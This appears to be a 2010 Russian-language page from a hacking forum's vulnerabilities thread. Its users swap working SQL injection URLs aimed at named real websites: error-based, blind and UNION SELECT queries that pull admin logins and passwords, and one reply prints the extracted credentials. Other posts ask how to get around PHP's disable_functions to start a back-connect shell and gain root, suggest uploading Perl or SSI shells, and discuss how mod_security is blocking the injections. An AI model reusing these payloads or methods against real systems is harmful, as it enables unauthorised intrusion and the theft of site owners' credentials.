HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1165 из 2422 « Первая < 165665106511151155 1161 1162 1163 1164 1165 1166 1167 1168 1169 11751215126516652165 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.03.2010, 07:39
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию
Цитата:
Сообщение от l1ght  
http://www.bourdela.tv/?'or(select+count(*)from(information_schema.column s)/**/group/**/by/**/concat(table_name,floor(rand(0)*2))/**/limit/**/7,1)*'
Не очень то получается с лимитом для вывода поочередно имена таблиц ((
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 10.03.2010, 09:55
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию
Как выполнить комманду,если
Код:
disable_functions	system,exec,passthru,shell_exec,posix_getpwuid,cmd,escapeshellcmd,popen,proc_open,ini_restore,dbmopen,suexec,show_source,escapeshellarg,set_time_limit,set_memory_limit
php 5.2.5
Последний раз редактировалось .:[melkiy]:.; 10.03.2010 в 12:07..
 
Ответить с цитированием

  #3  
Старый 10.03.2010, 10:18
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами: 9837719

Репутация: 466
По умолчанию
2.:[melkiy]:.
а может попробуешь загрузить перловый или SSI шелл!
SSI шелл дето здесь на ачате лежит!
 
Ответить с цитированием

  #4  
Старый 10.03.2010, 12:07
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию
Цитата:
Сообщение от Rubaka  
2.:[melkiy]:.
а может попробуешь загрузить перловый или SSI шелл!
SSI шелл дето здесь на ачате лежит!
Пробывал

Цитата:
Сообщение от Strilo4ka  
ну зато есть fopen fgets и тому подобное мб ценное мб в файлах...
У меня и так есть доступ к файлам. Нужно просто запустить бэк-коннект, чтобы порутать.Но комманды не пашут ибо:
Код:
disable_functions	system,exec,passthru,shell_exec,posix_getpwuid,cmd,escapeshellcmd,popen,proc_open,ini_restore,dbmopen,suexec,show_source,escapeshellarg,set_time_limit,set_memory_limit
Причем тут fopen и тп? Оо

safe mode Off
 
Ответить с цитированием

  #5  
Старый 10.03.2010, 13:07
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию
оказывается там не фильтрация... что-то очень хитрое, чего я догнать не могу

такой запрос проходит
Код:
http://www.gtbit.org/news/viewitem.php?id=37/*from*/+and+ascii(substring((select+version()),1,1))=53
значит всё-таки запрос обрабатывается

Я вот думаю, может это как-то сервер хитро настроен?

запрос:
Код:
http://www.gtbit.org/news/viewitem.php?id=37+and+1=2+union
проходит, а в связке с select выдаёт ошибку(с union+all+select тоже)
Код:
http://www.gtbit.org/news/viewitem.php?id=37+and+1=2+union+select
Получается не ищется вхождение подстроки 'union' и 'from'.
Также 'union' и 'from' не вырезается из строки, потому что
Код:
http://www.gtbit.org/news/viewitem.php?id=37+and+1=2+union
http://www.gtbit.org/news/viewitem.php?id=37+and+1=1+union
выдаёт ошибку мускуля

самое интересное то, что когда пишешь:
Код:
http://www.gtbit.org/news/viewitem.php?id=37+and+1=2+union+select
то он выдаёт ошибку

Код:
Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@gtbit.org and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
а при union без select
Код:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gtbitor/public_html/news/viewitem.php on line 45
Почему такая реакция?
Последний раз редактировалось Seravin; 10.03.2010 в 15:48..
 
Ответить с цитированием

  #6  
Старый 10.03.2010, 17:39
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию
2 Seravin:

mod_security там стоит и, если запрос корректный, а не сплошные ошибки синтаксиса sql-запроса, то тогда он реагирует на from и union, фильтры типо "/*!...*/ и прочие возвраты кареток не помогают в данном случае (вроде бы)

http://opennet.ru/base/sec/mod_security2.txt.html
http://forum.ovh.com/archive/index.php/t-30298.html

почитаешь тогда станет понятно, почему на одно действие 500, а на другое 406 какое-нибудь

а на что-то типо:

Код:
http://www.gtbit.org/news/viewitem.php?id=37+from+and+ascii(substring((select+version()),1,1))=53
он тебе и так по русски пишет - Warning, потому что неправильный синтаксис
 
Ответить с цитированием

  #7  
Старый 10.03.2010, 17:41
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию
Цитата:
Сообщение от Pashkela  
2 Seravin:

mod_security там стоит и, если запрос корректный, а не сплошные ошибки синтаксиса sql-запроса, то тогда он реагирует на from и union, фильтры типо "/*!...*/ и прочие возвраты кареток не помогают в данном случае (вроде бы)

http://opennet.ru/base/sec/mod_security2.txt.html
http://forum.ovh.com/archive/index.php/t-30298.html

почитаешь тогда станет понятно, почему на одно действие 500, а на другое 406 какое-нибудь

а на что-то типо:

Код:
http://www.gtbit.org/news/viewitem.php?id=37+from+and+ascii(substring((select+version()),1,1))=53
он тебе и так по русски пишет - Warning, потому что неправильный синтаксис
там не form, а /*form*/, но за ответ спасибо, почитаю
 
Ответить с цитированием

  #8  
Старый 10.03.2010, 18:22
Sharsky
Новичок
Регистрация: 03.03.2010
Сообщений: 9
С нами: 8522087

Репутация: 0
По умолчанию
Читал на форуме о Blind Injectionно не нашел как вывести ил колонки данные. (наверно плохо читал...)

Вот запрос:

Цитата:
http://www.pharmabort.ru/page.php?id=-16%20and%20%28SELECT%20sipt%28concat%280x3b,login, password%29,1,1%29%20from%20users%20limit%200,1%29 =1
Логин и пасс админа не выводит...
 
Ответить с цитированием

  #9  
Старый 10.03.2010, 19:20
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами: 8603287

Репутация: 87
По умолчанию
Цитата:
Сообщение от Sharsky  
Читал на форуме о Blind Injectionно не нашел как вывести ил колонки данные. (наверно плохо читал...)

Вот запрос:



Логин и пасс админа не выводит...
Цитата:
http://www.pharmabort.ru/page.php?id=-15 UNION SELECT 1,2,3,concat(0x7e,pharma_admins.login,0x7e,pharma_ admins.password,0x7e,pharma_admins.name,0x7e),5,6, 7,8,9,10,11,12,13,14,15+FROM+pharmabort.pharma_adm ins+LIMIT+0,1--
~mooncat~sql~netservice~
LIMIT+1,1--
~cons1~cons~Консультант
 
Ответить с цитированием

  #10  
Старый 10.03.2010, 19:30
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию
уже не надо этот скул
 
Ответить с цитированием
Ответ
Страница 1165 из 2422 « Первая < 165665106511151155 1161 1162 1163 1164 1165 1166 1167 1168 1169 11751215126516652165 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.